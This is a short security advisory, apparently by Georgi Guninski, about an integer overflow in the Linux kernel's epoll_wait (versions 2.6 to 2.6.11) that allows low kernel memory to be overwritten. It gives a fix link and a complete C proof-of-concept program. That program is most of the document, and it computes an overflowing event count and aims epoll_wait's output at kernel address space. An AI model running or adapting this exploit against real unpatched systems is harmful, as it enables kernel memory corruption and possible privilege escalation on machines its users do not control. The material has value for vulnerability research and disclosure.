kernel26lowmem.txt

`it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) memory   
due to integer overflow in sys_epoll_wait and misuse of __put_user   
in ep_send_events  
  
tested on i386.  
despite the overflow, the os seemingly continues normal operation.  
  
fix:  
http://linux.bkbits.net:8080/linux-2.6/cset@422dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d  
  
-------------------------------------------------  
/*  
* copyright georgi guninski.  
* cannot be used in vulnerabilities databases like securityfocus and mitre  
* */  
#include <stdio.h>  
#include <sys/epoll.h>  
#include <sys/socket.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
#include <unistd.h>  
#include <stdlib.h>  
#define __KERNEL__  
#include <asm/processor.h>  
#undef __KERNEL__  
  
#define MAXV 500  
  
int main(int argc,char ** argv)  
{  
int epfd;  
int i;  
int res;  
struct epoll_event ev;  
int *fds;  
int over;  
void *km;  
  
over= ((unsigned int)-1)/sizeof(struct epoll_event)+1;  
km=(void *)(TASK_SIZE - over*sizeof(struct epoll_event) - 4);  
printf("sizeof=%d %x %lx\n",sizeof(struct epoll_event),over,(unsigned long)km);  
  
epfd = epoll_create(MAXV);  
printf("Epoll descriptor %i\n",epfd);  
fds=calloc(2*MAXV,sizeof(int));  
for(i=0;i<MAXV;i++)  
{   
if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2*i])) perror("pair");  
ev.data.u32 = 0x42424242;  
ev.events = EPOLLOUT|EPOLLIN | 0x42424242;  
res = epoll_ctl(epfd,EPOLL_CTL_ADD,fds[2*i],&ev);  
}   
for(i=0;i<MAXV;i++) write(fds[2*i+1],&i,sizeof(i));  
  
system("sync");  
  
for(i = 0; i < 1; i++)  
{  
res = epoll_wait(epfd,km,over,-1);  
printf("epoll_wait returned %i\n",res);  
printf("check what is after TASK_SIZE\n");   
}  
  
close(epfd);  
return 42;  
}  
-----------------------------------------   
  
--   
where do you want bill gates to go today?  
  
`